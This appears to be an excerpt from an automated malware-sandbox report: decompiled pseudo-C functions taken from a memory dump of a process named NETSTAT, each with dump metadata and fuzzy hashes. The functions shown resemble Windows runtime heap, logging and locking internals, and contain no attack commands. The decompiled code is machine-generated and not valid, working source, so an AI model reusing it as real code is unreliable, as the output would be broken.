                					asm("lock xadd [esi], eax");
                					if((_t34 | 0xffffffff) == 0) {
                						 *0x344b1e0(_t61);
                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                					}
                					goto L7;
                				}
                				L4:
                				_t31 = 0x7ffe0386;
                				goto L5;
                			}





















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50eb85807f0cabcbd9a6a5bda9efa092b1a2eeab095beca75c7d631cb3f2d093
                • Instruction ID: 55358e99bae2b2a7564dacf3340f425884d92c4f1acfbe3b4dbc401059cfe015
                • Opcode Fuzzy Hash: 50eb85807f0cabcbd9a6a5bda9efa092b1a2eeab095beca75c7d631cb3f2d093
                • Instruction Fuzzy Hash: 1D318F35601B04CFD735CF28CC80B96B3E5FF88724F18456DE5969BA90EB39A801CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E033D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                				signed short* _v8;
                				signed char _v12;
                				void* _t22;
                				signed char* _t23;
                				intOrPtr _t24;
                				signed short* _t44;
                				void* _t47;
                				signed char* _t56;
                				signed char* _t58;
                
                				_t48 = __ecx;
                				_push(__ecx);
                				_push(__ecx);
                				_t44 = __ecx;
                				_v12 = __edx;
                				_v8 = __ecx;
                				_t22 = E03377D50();
                				_t58 = 0x7ffe0384;
                				if(_t22 == 0) {
                					_t23 = 0x7ffe0384;
                				} else {
                					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                				}
                				if( *_t23 != 0) {
                					_t24 =  *0x3447b9c; // 0x0
                					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                					_t23 = L03374620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                					_t56 = _t23;
                					if(_t56 != 0) {
                						_t56[0x24] = _a4;
                						_t56[0x28] = _a8;
                						_t56[6] = 0x1420;
                						_t56[0x20] = _v12;
                						_t14 =  &(_t56[0x2c]); // 0x2c
                						E0339F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                						if(E03377D50() != 0) {
                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                						}
                						_push(_t56);
                						_push(_t47 - 0x20);
                						_push(0x402);
                						_push( *_t58 & 0x000000ff);
                						E03399AE0();
                						_t23 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                					}
                				}
                				return _t23;
                			}













                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1920c887c49f615d4cd7a002a952a1f93744a30dac18f8ca48191f72d29e239
                • Instruction ID: 84d6a0f40cd90928446742c927ff44fe9089568fea99a4665dfb9fcfc03a741a
                • Opcode Fuzzy Hash: e1920c887c49f615d4cd7a002a952a1f93744a30dac18f8ca48191f72d29e239
                • Instruction Fuzzy Hash: DB218BB6A00644AFD725DB68D880F6AB7B8FF48744F14006AF904DB791E738ED11CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E033990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                				intOrPtr* _v0;
                				void* _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				char _v36;
                				void* _t38;
                				intOrPtr _t41;
                				void* _t44;
                				signed int _t45;
                				intOrPtr* _t49;
                				signed int _t57;
                				signed int _t58;
                				intOrPtr* _t59;
                				void* _t62;
                				void* _t63;
                				void* _t65;
                				void* _t66;
                				signed int _t69;
                				intOrPtr* _t70;
                				void* _t71;
                				intOrPtr* _t72;
                				intOrPtr* _t73;
                				char _t74;
                
                				_t65 = __edx;
                				_t57 = _a4;
                				_t32 = __ecx;
                				_v8 = __edx;
                				_t3 = _t32 + 0x14c; // 0x14c
                				_t70 = _t3;
                				_v16 = __ecx;
                				_t72 =  *_t70;
                				while(_t72 != _t70) {
                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                						L24:
                						_t72 =  *_t72;
                						continue;
                					}
                					_t30 = _t72 + 0x10; // 0x10
                					if(E033AD4F0(_t30, _t65, _t57) == _t57) {
                						return 0xb7;
                					}
                					_t65 = _v8;
                					goto L24;
                				}
                				_t61 = _t57;
                				_push( &_v12);
                				_t66 = 0x10;
                				if(E0338E5E0(_t57, _t66) < 0) {
                					return 0x216;
                				}
                				_t73 = L03374620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                				if(_t73 == 0) {
                					_t38 = 0xe;
                					return _t38;
                				}
                				_t9 = _t73 + 0x10; // 0x10
                				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                				E0339F3E0(_t9, _v8, _t57);
                				_t41 =  *_t70;
                				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                					_t62 = 3;
                					asm("int 0x29");
                					_push(_t62);
                					_push(_t57);
                					_push(_t73);
                					_push(_t70);
                					_t71 = _t62;
                					_t74 = 0;
                					_v36 = 0;
                					_t63 = E0338A2F0(_t62, _t71, 1, 6,  &_v36);
                					if(_t63 == 0) {
                						L20:
                						_t44 = 0x57;
                						return _t44;
                					}
                					_t45 = _v12;
                					_t58 = 0x1c;
                					if(_t45 < _t58) {
                						goto L20;
                					}
                					_t69 = _t45 / _t58;
                					if(_t69 == 0) {
                						L19:
                						return 0xe8;
                					}
                					_t59 = _v0;
                					do {
                						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                							goto L18;
                						}
                						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                						 *_t59 = _t49;
                						if( *_t49 != 0x53445352) {
                							goto L18;
                						}
                						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                						return 0;
                						L18:
                						_t63 = _t63 + 0x1c;
                						_t74 = _t74 + 1;
                					} while (_t74 < _t69);
                					goto L19;
                				}
                				 *_t73 = _t41;
                				 *((intOrPtr*)(_t73 + 4)) = _t70;
                				 *((intOrPtr*)(_t41 + 4)) = _t73;
                				 *_t70 = _t73;
                				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                				return 0;
                			}



























                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction ID: 40c1be2b7cf16a03a67d1b70e208a8940b961d707ffb849cea63db6668a2c9ad
                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                • Instruction Fuzzy Hash: 78218075A00304EFEB20DF59C884A6AF7F8EB48310F15886BE945AB610D330ED40CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E03383B7A(void* __ecx) {
                				signed int _v8;
                				char _v12;
                				intOrPtr _v20;
                				intOrPtr _t17;
                				intOrPtr _t26;
                				void* _t35;
                				void* _t38;
                				void* _t41;
                				intOrPtr _t44;
                
                				_t17 =  *0x34484c4; // 0x0
                				_v12 = 1;
                				_v8 =  *0x34484c0 * 0x4c;
                				_t41 = __ecx;
                				_t35 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x34484c0 * 0x4c);
                				if(_t35 == 0) {
                					_t44 = 0xc0000017;
                				} else {
                					_push( &_v8);
                					_push(_v8);
                					_push(_t35);
                					_push(4);
                					_push( &_v12);
                					_push(0x6b);
                					_t44 = E0339AA90();
                					_v20 = _t44;
                					if(_t44 >= 0) {
                						E0339FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x34484c0 * 0xc);
                						_t38 = _t35;
                						if(_t35 < _v8 + _t35) {
                							do {
                								asm("movsd");
                								asm("movsd");
                								asm("movsd");
                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                							} while (_t38 < _v8 + _t35);
                							_t44 = _v20;
                						}
                					}
                					_t26 =  *0x34484c4; // 0x0
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                				}
                				return _t44;
                			}













                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82ef26df333277ccdec1aed741047b383acf02634625b6cc0c6d6227277f347d
                • Instruction ID: cd27e4eb2e32735cdd572bfedbcb2209a3de8a4d9f9a30590f11695bbbdeda7c
                • Opcode Fuzzy Hash: 82ef26df333277ccdec1aed741047b383acf02634625b6cc0c6d6227277f347d
                • Instruction Fuzzy Hash: 0921927AA00204EFD710EF58DDC1B6AB7BDFB44718F150169E504AB251D375ED01CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E033D6CF0(void* __edx, intOrPtr _a4, short _a8) {
                				char _v8;
                				char _v12;
                				char _v16;
                				char _v20;
                				char _v28;
                				char _v36;
                				char _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed char* _t21;
                				void* _t24;
                				void* _t36;
                				void* _t38;
                				void* _t46;
                
                				_push(_t36);
                				_t46 = __edx;
                				_v12 = 0;
                				_v8 = 0;
                				_v20 = 0;
                				_v16 = 0;
                				if(E03377D50() == 0) {
                					_t21 = 0x7ffe0384;
                				} else {
                					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                				}
                				if( *_t21 != 0) {
                					_t21 =  *[fs:0x30];
                					if((_t21[0x240] & 0x00000004) != 0) {
                						if(E03377D50() == 0) {
                							_t21 = 0x7ffe0385;
                						} else {
                							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                						}
                						if(( *_t21 & 0x00000020) != 0) {
                							_t56 = _t46;
                							if(_t46 == 0) {
                								_t46 = 0x3335c80;
                							}
                							_push(_t46);
                							_push( &_v12);
                							_t24 = E0338F6E0(_t36, 0, _t46, _t56);
                							_push(_a4);
                							_t38 = _t24;
                							_push( &_v28);
                							_t21 = E0338F6E0(_t38, 0, _t46, _t56);
                							if(_t38 != 0) {
                								if(_t21 != 0) {
                									E033D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                									L03372400( &_v52);
                								}
                								_t21 = L03372400( &_v28);
                							}
                						}
                					}
                				}
                				return _t21;
                			}




















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6cf53b7312a628df60108e9d4e57dcd8d03fa2575b31d9ca9947c17c0cc97502
                • Instruction ID: 92a98ae1ca19bdd125f7abe53eb74e00d266a423251cdb490a5fda530a022c26
                • Opcode Fuzzy Hash: 6cf53b7312a628df60108e9d4e57dcd8d03fa2575b31d9ca9947c17c0cc97502
                • Instruction Fuzzy Hash: 2121F2739003889BC721EF68E9C4B6BB7ECEF85640F480956F950DB250E734C908C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0342070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                				char _v8;
                				intOrPtr _v11;
                				signed int _v12;
                				intOrPtr _v15;
                				signed int _v16;
                				intOrPtr _v28;
                				void* __ebx;
                				char* _t32;
                				signed int* _t38;
                				signed int _t60;
                
                				_t38 = __ecx;
                				_v16 = __edx;
                				_t60 = E034207DF(__ecx, __edx,  &_a4,  &_a8, 2);
                				if(_t60 != 0) {
                					_t7 = _t38 + 0x38; // 0x29cd5903
                					_push( *_t7);
                					_t9 = _t38 + 0x34; // 0x6adeeb00
                					_push( *_t9);
                					_v12 = _a8 << 0xc;
                					_t11 = _t38 + 4; // 0x5de58b5b
                					_push(0x4000);
                					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                					E0341AFDE( &_v8,  &_v12);
                					E03421293(_t38, _v28, _t60);
                					if(E03377D50() == 0) {
                						_t32 = 0x7ffe0380;
                					} else {
                						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                					}
                					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                						_t21 = _t38 + 0x3c; // 0xc3595e5f
                						E034114FB(_t38,  *_t21, _v11, _v15, 0xd);
                					}
                				}
                				return  ~_t60;
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction ID: 7e65fe74e608d37f5eeef4de6cdaa033a8f2e1bd4b75f93f7ba5be9fb1cbc74d
                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                • Instruction Fuzzy Hash: 8A21223A2046109FC705DF18C880A6BBBE5EFC0350F08852EF994AF381D730D809CB95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E033D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _t21;
                				void* _t24;
                				intOrPtr _t25;
                				void* _t36;
                				short _t39;
                				signed char* _t42;
                				unsigned int _t46;
                				void* _t50;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t21 =  *0x3447b9c; // 0x0
                				_t46 = _a8;
                				_v12 = __edx;
                				_v8 = __ecx;
                				_t4 = _t46 + 0x2e; // 0x2e
                				_t36 = _t4;
                				_t24 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                				_t50 = _t24;
                				if(_t50 != 0) {
                					_t25 = _a4;
                					if(_t25 == 5) {
                						L3:
                						_t39 = 0x14b1;
                					} else {
                						_t39 = 0x14b0;
                						if(_t25 == 6) {
                							goto L3;
                						}
                					}
                					 *((short*)(_t50 + 6)) = _t39;
                					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                					_t11 = _t50 + 0x2c; // 0x2c
                					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                					E0339F3E0(_t11, _a12, _t46);
                					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                					if(E03377D50() == 0) {
                						_t42 = 0x7ffe0384;
                					} else {
                						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                					}
                					_push(_t50);
                					_t19 = _t36 - 0x20; // 0xe
                					_push(0x403);
                					_push( *_t42 & 0x000000ff);
                					E03399AE0();
                					_t24 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                				}
                				return _t24;
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ce5f2f504f91afb68f20e15b50f826584c7ff1e0cc855c08562ff4299048fd3
                • Instruction ID: bcaa1e6554c56d5f6fa2680188a60922a6e78e86c8f9171c128d1e2afa5b4ed7
                • Opcode Fuzzy Hash: 0ce5f2f504f91afb68f20e15b50f826584c7ff1e0cc855c08562ff4299048fd3
                • Instruction Fuzzy Hash: DE219D76900644EFC725DF69DCC0EABBBA8EF48340F14056DF50ADB650E634E900CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E0337AE73(intOrPtr __ecx, void* __edx) {
                				intOrPtr _v8;
                				void* _t19;
                				char* _t22;
                				signed char* _t24;
                				intOrPtr _t25;
                				intOrPtr _t27;
                				void* _t31;
                				intOrPtr _t36;
                				char* _t38;
                				signed char* _t42;
                
                				_push(__ecx);
                				_t31 = __edx;
                				_v8 = __ecx;
                				_t19 = E03377D50();
                				_t38 = 0x7ffe0384;
                				if(_t19 != 0) {
                					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                				} else {
                					_t22 = 0x7ffe0384;
                				}
                				_t42 = 0x7ffe0385;
                				if( *_t22 != 0) {
                					if(E03377D50() == 0) {
                						_t24 = 0x7ffe0385;
                					} else {
                						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                					}
                					if(( *_t24 & 0x00000010) != 0) {
                						goto L17;
                					} else {
                						goto L3;
                					}
                				} else {
                					L3:
                					_t27 = E03377D50();
                					if(_t27 != 0) {
                						_t27 =  *[fs:0x30];
                						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                					}
                					if( *_t38 != 0) {
                						_t27 =  *[fs:0x30];
                						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                							goto L5;
                						}
                						_t27 = E03377D50();
                						if(_t27 != 0) {
                							_t27 =  *[fs:0x30];
                							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                						}
                						if(( *_t42 & 0x00000020) != 0) {
                							L17:
                							_t25 = _v8;
                							_t36 = 0;
                							if(_t25 != 0) {
                								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                							}
                							_t27 = E033D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                						}
                						goto L5;
                					} else {
                						L5:
                						return _t27;
                					}
                				}
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction ID: c479c20985b50f4c2c6d66064bb94ac07e70820ece5e603b7fdac9a30423c738
                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                • Instruction Fuzzy Hash: 49218071A216819BDB25DB69C9C4B2677E8AF44650F1D04A4ED04CBBA2EBB8DC50C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0338FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				intOrPtr _v8;
                				void* _t19;
                				intOrPtr _t29;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				intOrPtr _t37;
                				intOrPtr* _t40;
                
                				_t35 = __edx;
                				_push(__ecx);
                				_push(__ecx);
                				_t37 = 0;
                				_v8 = __edx;
                				_t29 = __ecx;
                				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                					L3:
                					_t19 = _a4 - 4;
                					if(_t19 != 0) {
                						if(_t19 != 1) {
                							L7:
                							return _t37;
                						}
                						if(_t35 == 0) {
                							L11:
                							_t37 = 0xc000000d;
                							goto L7;
                						}
                						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                							_t35 = _v8;
                						}
                						 *((intOrPtr*)(_t40 + 4)) = _t35;
                						goto L7;
                					}
                					if(_t29 == 0) {
                						goto L11;
                					}
                					_t32 =  *_t40;
                					if(_t32 != 0) {
                						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                						E033676E2( *_t40);
                					}
                					 *_t40 = _t29;
                					goto L7;
                				}
                				_t40 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                				if(_t40 == 0) {
                					_t37 = 0xc0000017;
                					goto L7;
                				}
                				_t35 = _v8;
                				 *_t40 = 0;
                				 *((intOrPtr*)(_t40 + 4)) = 0;
                				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                				goto L3;
                			}











                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction ID: c1b53e6ae580bddbcd94f03eaf77d7d548a02863a5f689a9720a6049feebd36c
                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                • Instruction Fuzzy Hash: CC217C72A00740DFC731DF09E980A66F7E9EB94A14F28816EE9498BA24D734EC01CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E0338B390(void* __ecx, intOrPtr _a4) {
                				signed int _v8;
                				signed char _t12;
                				signed int _t16;
                				signed int _t21;
                				void* _t28;
                				signed int _t30;
                				signed int _t36;
                				signed int _t41;
                
                				_push(__ecx);
                				_t41 = _a4 + 0xffffffb8;
                				E03372280(_t12, 0x3448608);
                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                				asm("sbb edi, edi");
                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                				_v8 = _t36;
                				asm("lock cmpxchg [ebx], ecx");
                				_t30 = 1;
                				if(1 != 1) {
                					while(1) {
                						_t21 = _t30 & 0x00000006;
                						_t16 = _t30;
                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                						asm("lock cmpxchg [edi], esi");
                						if(_t16 == _t30) {
                							break;
                						}
                						_t30 = _t16;
                					}
                					_t36 = _v8;
                					if(_t21 == 2) {
                						_t16 = E033900C2(0x3448608, 0, _t28);
                					}
                				}
                				if(_t36 != 0) {
                					_t16 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                				}
                				return _t16;
                			}












                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e98b5e283a1a53a4048367fd0338927ceb945d991f549f259326c0742755968d
                • Instruction ID: 8515b5c15f6c536d52a70b9388770bda0e1458cdbbe77f37b0caeee1ad5b8eb5
                • Opcode Fuzzy Hash: e98b5e283a1a53a4048367fd0338927ceb945d991f549f259326c0742755968d
                • Instruction Fuzzy Hash: D9116B377112189BCB28DB148DC1A6BB25AEBC5370B29013EDD1ACB790CA769C02C794
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E03359240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr _t33;
                				intOrPtr _t37;
                				intOrPtr _t41;
                				intOrPtr* _t46;
                				void* _t48;
                				intOrPtr _t50;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr _t62;
                				intOrPtr _t65;
                				void* _t66;
                				void* _t68;
                
                				_push(0xc);
                				_push(0x342f708);
                				E033AD08C(__ebx, __edi, __esi);
                				_t65 = __ecx;
                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                				if( *(__ecx + 0x24) != 0) {
                					_push( *(__ecx + 0x24));
                					E033995D0();
                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                				}
                				L6();
                				L6();
                				_push( *((intOrPtr*)(_t65 + 0x28)));
                				E033995D0();
                				_t33 =  *0x34484c4; // 0x0
                				L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                				_t37 =  *0x34484c4; // 0x0
                				L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                				_t41 =  *0x34484c4; // 0x0
                				E03372280(L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x34486b4);
                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                				_t46 = _t65 + 0xe8;
                				_t62 =  *_t46;
                				_t60 =  *((intOrPtr*)(_t46 + 4));
                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                					_t61 = 3;
                					asm("int 0x29");
                					_push(_t65);
                					_t66 = _t61;
                					_t23 = _t66 + 0x14; // 0x8df8084c
                					_push( *_t23);
                					E033995D0();
                					_t24 = _t66 + 0x10; // 0x89e04d8b
                					_push( *_t24);
                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                					_t48 = E033995D0();
                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                					return _t48;
                				} else {
                					 *_t60 = _t62;
                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                					 *(_t68 - 4) = 0xfffffffe;
                					E03359325();
                					_t50 =  *0x34484c4; // 0x0
                					return E033AD0D1(L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                				}
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 943678d2901686e8cee94b13e51ec460739a128bf5c92f96eb07305e53f40a8f
                • Instruction ID: 9171742945ef4b8d634626d76ec9363f7ac837b26cfbcb11bbc9dde43c2519eb
                • Opcode Fuzzy Hash: 943678d2901686e8cee94b13e51ec460739a128bf5c92f96eb07305e53f40a8f
